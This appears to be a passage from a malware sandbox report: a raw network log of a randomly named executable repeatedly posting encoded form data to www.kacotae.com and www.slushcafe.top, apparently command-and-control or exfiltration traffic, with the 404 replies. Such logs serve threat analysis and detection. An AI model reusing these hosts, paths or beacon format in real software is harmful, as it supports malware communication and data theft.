                                                      21192.168.2.95413164.226.69.42801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:08.505729914 CEST692OUTPOST /rdfm/ HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.kacotae.com
                                                      Referer: http://www.kacotae.com/rdfm/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 31 44 62 42 62 42 4e 31 47 4e 44 72 62 35 59 55 6f 7a 31 38 56 56 67 42 4d 64 70 45 2b 5a 65 67 42 49 46 4a 4b 4a 47 64 58 46 65 6b 42 6f 6a 30 51 79 33 74 36 47 33 62 32 4c 48 52 6f 43 71 72 2f 47 36 52 6b 6d 63 73 52 30 5a 4a 4d 73 66 36 37 48 52 57 30 75 51 32 55 61 54 79 67 77 32 49 37 54 39 4f 6a 35 33 4d 76 4e 55 76 45 64 69 7a 63 4f 2f 56 6a 58 68 67 36 43 2f 2b 41 74 67 57 30 42 31 58 5a 63 4f 6a 75 61 5a 56 35 31 38 63 52 74 58 68 72 42 4a 69 6d 4b 6c 6e 47 72 42 51 6f 44 57 48 6c 39 63 6a 62 50 59 4a 37 62 4e 77
                                                      Data Ascii: dZo=9pMmvcz73uDu1DbBbBN1GNDrb5YUoz18VVgBMdpE+ZegBIFJKJGdXFekBoj0Qy3t6G3b2LHRoCqr/G6RkmcsR0ZJMsf67HRW0uQ2UaTygw2I7T9Oj53MvNUvEdizcO/VjXhg6C/+AtgW0B1XZcOjuaZV518cRtXhrBJimKlnGrBQoDWHl9cjbPYJ7bNw
                                                      Aug 18, 2024 18:26:09.343399048 CEST361INHTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:09 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.95413264.226.69.42801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:11.048937082 CEST716OUTPOST /rdfm/ HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.kacotae.com
                                                      Referer: http://www.kacotae.com/rdfm/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 32 67 43 70 31 4a 4c 49 47 64 57 46 65 6b 50 49 6a 37 4e 69 33 6b 36 47 37 6c 32 4b 37 52 6f 43 2b 72 2f 45 79 52 6b 52 49 72 58 6b 5a 48 55 63 66 34 31 6e 52 57 30 75 51 32 55 61 57 5a 67 77 65 49 34 6a 74 4f 68 59 33 54 6a 74 55 73 44 64 69 7a 4e 65 2f 4a 6a 58 68 57 36 44 69 70 41 76 6f 57 30 42 6c 58 59 4a 69 73 6b 61 5a 54 30 56 39 54 62 4f 2b 4e 7a 7a 45 2f 6c 61 39 53 63 39 56 54 69 43 32 5a 30 50 56 34 4f 59 59 75 38 38 45 59 64 4d 78 35 59 32 47 32 4a 7a 70 58 49 2b 68 48 50 42 6c 6f 6f 67 3d 3d
                                                      Data Ascii: dZo=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/q2gCp1JLIGdWFekPIj7Ni3k6G7l2K7RoC+r/EyRkRIrXkZHUcf41nRW0uQ2UaWZgweI4jtOhY3TjtUsDdizNe/JjXhW6DipAvoW0BlXYJiskaZT0V9TbO+NzzE/la9Sc9VTiC2Z0PV4OYYu88EYdMx5Y2G2JzpXI+hHPBloog==
                                                      Aug 18, 2024 18:26:11.700546980 CEST361INHTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:11 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.95413364.226.69.42801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:13.612517118 CEST1729OUTPOST /rdfm/ HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.kacotae.com
                                                      Referer: http://www.kacotae.com/rdfm/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 75 67 42 61 74 4a 4b 72 75 64 56 46 65 6b 52 59 69 38 4e 69 32 6b 36 47 6a 68 32 4b 32 6d 6f 41 47 72 2b 6e 71 52 73 46 6b 72 65 6b 5a 48 49 73 66 37 37 48 52 44 30 75 41 36 55 62 6d 5a 67 77 65 49 34 6c 52 4f 79 70 33 54 6c 74 55 76 45 64 69 2f 63 4f 2f 31 6a 58 4a 47 36 44 6e 55 41 37 63 57 7a 67 56 58 65 37 61 73 73 61 5a 52 31 56 38 4d 62 4f 69 53 7a 7a 5a 45 6c 61 4a 72 63 36 5a 54 67 33 47 42 6a 4f 68 44 55 4b 55 47 2b 75 67 4c 45 37 38 61 58 55 44 73 51 52 52 6d 52 73 73 57 63 7a 34 51 38 70 4a 35 5a 33 59 76 6a 36 36 6c 6f 49 49 48 79 50 6d 4b 33 6e 2b 77 65 65 4a 5a 42 4e 61 37 47 35 44 74 67 4c 61 34 49 51 61 6b 52 34 2b 66 30 74 69 50 30 56 76 50 6c 70 33 72 62 43 4a 58 49 44 6c 57 6d 47 49 35 61 64 49 33 39 51 4b 48 34 35 45 33 43 32 69 48 4b 64 72 4b 6b 4e 57 76 39 68 77 7a 64 4e 72 74 2f 50 6a 54 57 34 62 71 41 7a 64 31 58 35 36 73 58 5a 66 33 43 75 [TRUNCATED]
                                                      Data Ascii: dZo=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/qugBatJKrudVFekRYi8Ni2k6Gjh2K2moAGr+nqRsFkrekZHIsf77HRD0uA6UbmZgweI4lROyp3TltUvEdi/cO/1jXJG6DnUA7cWzgVXe7assaZR1V8MbOiSzzZElaJrc6ZTg3GBjOhDUKUG+ugLE78aXUDsQRRmRssWcz4Q8pJ5Z3Yvj66loIIHyPmK3n+weeJZBNa7G5DtgLa4IQakR4+f0tiP0VvPlp3rbCJXIDlWmGI5adI39QKH45E3C2iHKdrKkNWv9hwzdNrt/PjTW4bqAzd1X56sXZf3CufVH16DL5aEIP8oGkSj4k7ssm/bUhvbkH242MQsO/GXeek8d72gwUNhki+JQYHFgalMOHxZYJxvBkfWSCeVAAu8h/hWGobeDRRzDnfR47yBxU+UwKl3mFIllb9kBCrvTntMds7zQ2tIQIrQ1E4zFMoqwj9a0CcXW7Y2GnvXbQ2xrJqHgGxxPm2pVfHJ9NvtrMDMhHBGue1gIWrcqgKnOhCxjTXiQzxKV576ujzX6s7ZehdymY3YcE+HMDX1W0lnafYDQSH9jWZqfnwIVfb1+yPuY+GGJ5vYX9esztQ47vo39q/eQN0xFgtQC7copF1Ib2bpnKnzxJGOlGcl+0ptQyosgRApzayivqLRrSv3QgWiiRF65/HTgjLzPBtevtuf2ukaWpZ5PbUgWhREbPw/HJjW9Is9tjec0onPWmQQkSqQ6Dg4F4yrfBwzQYsMP9xJWXzTjP5gNqZhH9gegmq/IwnY4/Uo9EVND1oqrIHcVkMOtnG+wHrkt9LKVpLVwKj3U9OHZUzAF/SNQW3DEoBn+HdxzKXHK1zaqg5/SjCT76/FLJAzNZU6GqtMJjzB7PMJvgsQHE9JS0oQzoJFcWk33IaPrfAjtO8s6kEzgUAVInion0Lt93YFkHeJMEQBwQY6AeMdPv/YkSIA4lvrhjiQ8TDeoFkppaRGtzML [TRUNCATED]
                                                      Aug 18, 2024 18:26:14.261090994 CEST361INHTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:14 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.95413464.226.69.42801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:16.138067007 CEST437OUTGET /rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:26:16.777698040 CEST699INHTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:16 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 552
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.954135203.161.55.102801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:22.000504017 CEST698OUTPOST /irn0/ HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.slushcafe.top
                                                      Referer: http://www.slushcafe.top/irn0/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 39 57 36 57 4d 4c 6a 61 62 38 2b 48 69 58 32 66 55 58 48 50 49 42 4c 47 2b 51 6a 57 47 58 6d 45 68 50 4a 2b 55 66 35 71 32 52 70 6f 38 59 53 72 76 78 55 52 43 4c 56 31 33 67 76 59 41 57 75 39 56 7a 73 46 64 68 68 66 64 64 4c 6e 43 58 6b 46 50 75 6f 5a 32 45 6d 75 63 4a 46 33 63 59 73 77 48 62 46 6d 50 58 56 49 45 67 5a 52 62 33 54 6f 37 67 43 67 45 66 65 38 78 62 69 71 42 55 6e 50 4b 77 2f 4a 75 63 37 55 6d 38 52 6b 46 77 54 43 39 4e 2b 55 4e 62 35 41 38 52 75 73 77 72 44 70 45 76 70 35 68 6b 48 56 2b 33 45 37 33 34 74 46
                                                      Data Ascii: dZo=mmMV1xSFqhYG9W6WMLjab8+HiX2fUXHPIBLG+QjWGXmEhPJ+Uf5q2Rpo8YSrvxURCLV13gvYAWu9VzsFdhhfddLnCXkFPuoZ2EmucJF3cYswHbFmPXVIEgZRb3To7gCgEfe8xbiqBUnPKw/Juc7Um8RkFwTC9N+UNb5A8RuswrDpEvp5hkHV+3E734tF
                                                      Aug 18, 2024 18:26:22.591425896 CEST533INHTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:22 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.954136203.161.55.102801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:24.531580925 CEST722OUTPOST /irn0/ HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.slushcafe.top
                                                      Referer: http://www.slushcafe.top/irn0/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 43 45 68 76 35 2b 56 65 35 71 7a 52 70 6f 6f 6f 53 75 69 52 55 47 43 4c 5a 54 33 69 4c 59 41 57 36 39 56 79 63 46 64 51 68 63 63 4e 4c 6c 4f 33 6b 48 4c 75 6f 5a 32 45 6d 75 63 4a 52 52 63 59 55 77 48 6f 64 6d 41 53 70 4a 59 51 5a 57 53 58 54 6f 74 51 44 70 45 66 65 4f 78 61 75 45 42 53 37 50 4b 79 33 4a 75 49 76 56 78 73 52 71 59 41 53 67 30 39 62 34 4e 62 67 63 32 67 69 47 6f 4a 48 51 4f 75 4a 6e 77 57 4f 4f 72 67 45 63 77 66 6b 74 6e 48 62 68 58 6a 65 56 46 75 68 77 77 38 30 65 78 65 33 6a 73 41 3d 3d
                                                      Data Ascii: dZo=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG+RnGGlCEhv5+Ve5qzRpoooSuiRUGCLZT3iLYAW69VycFdQhccNLlO3kHLuoZ2EmucJRRcYUwHodmASpJYQZWSXTotQDpEfeOxauEBS7PKy3JuIvVxsRqYASg09b4Nbgc2giGoJHQOuJnwWOOrgEcwfktnHbhXjeVFuhww80exe3jsA==
                                                      Aug 18, 2024 18:26:25.374361992 CEST533INHTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:25 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.954137203.161.55.102801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:27.060240984 CEST1735OUTPOST /irn0/ HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.slushcafe.top
                                                      Referer: http://www.slushcafe.top/irn0/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 4b 45 67 65 5a 2b 55 35 6c 71 30 52 70 6f 72 6f 53 76 69 52 56 45 43 49 70 50 33 69 32 6c 41 53 4b 39 55 52 45 46 66 6a 35 63 58 4e 4c 6c 47 58 6b 47 50 75 6f 4d 32 41 36 69 63 4a 42 52 63 59 55 77 48 75 78 6d 4a 6e 56 4a 4c 41 5a 52 62 33 54 6b 37 67 43 4d 45 66 58 35 78 61 36 36 42 45 4c 50 45 78 66 4a 68 64 37 56 79 4d 52 6f 62 41 53 47 30 39 6e 6e 4e 62 4e 6c 32 67 57 73 6f 4c 6e 51 50 6f 38 6f 68 43 4b 30 76 6a 30 76 34 63 4d 39 70 33 57 4a 58 43 43 53 62 37 39 56 6a 50 42 58 6b 65 75 36 7a 6d 61 65 30 57 4f 74 6a 49 36 43 52 35 59 74 35 6b 79 4e 46 74 72 65 56 53 2f 63 37 39 4f 65 63 32 48 68 54 69 63 7a 43 64 36 64 73 74 47 69 4f 4e 71 30 36 51 6c 71 59 4a 34 6b 72 75 4c 72 49 6a 4b 30 62 34 79 30 45 52 6b 2f 5a 4a 4f 4f 48 44 2f 67 67 41 38 75 72 32 4b 33 44 49 71 51 50 61 6f 59 61 78 47 73 69 52 6c 30 43 67 66 51 4d 43 52 38 58 57 6f 54 35 76 37 55 54 78 [TRUNCATED]
                                                      Data Ascii: dZo=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG+RnGGlKEgeZ+U5lq0RporoSviRVECIpP3i2lASK9UREFfj5cXNLlGXkGPuoM2A6icJBRcYUwHuxmJnVJLAZRb3Tk7gCMEfX5xa66BELPExfJhd7VyMRobASG09nnNbNl2gWsoLnQPo8ohCK0vj0v4cM9p3WJXCCSb79VjPBXkeu6zmae0WOtjI6CR5Yt5kyNFtreVS/c79Oec2HhTiczCd6dstGiONq06QlqYJ4kruLrIjK0b4y0ERk/ZJOOHD/ggA8ur2K3DIqQPaoYaxGsiRl0CgfQMCR8XWoT5v7UTx30rFpBv/PAxYjHX5Beg6vvKUeU+W3s4DaDLskCVCpZzKQ3hUvXR4dlOvFfxsGU3PKuuczx+sG0KWhyMy9PfHnAzUJpaFRow5vYfIH0CskZzv0+TM4liN3EHz/K31AvOxf3lXMqdug5KoXvqFbldgP0Lzj4pmoXhRuN1xe3DvyvzMFyz01jJNHk69VUY9+neTDr844+T5nEHlOupEl91RXLvgZns2fzDRix3P8RXTFtsCN0CaBzHuwQAPRmUHKY51QGS+VcOrMSkXMzv5NOFbcy7yfpvwV8tIR1keZku+THEDrdPbTfwinlbOy3Uf4ZGJzQs8YgaQSBiNw4IEwNqs9tw8pS1pLuYIUNgc57ZtQHza3ueXQ0AoBxzDb7Gi4MeJGfk2K10MyuGvwdiQLB2x7bWfD6wWFHiQX19dYtre1sWiyYh0VdRYJCgJ26sjv5hb3NuTDu9qVv6hm7dCNfIK3+1LmPm/OyAVfownp4bCurCWENVfACIlJvqUWxuQp/xy46Iu33M0DCdHQf3RSY7IHS8JRS7/tXTPRGoOBMi6GyxOksrBqLfeUf0NO2nfXm/i5jzba50vRo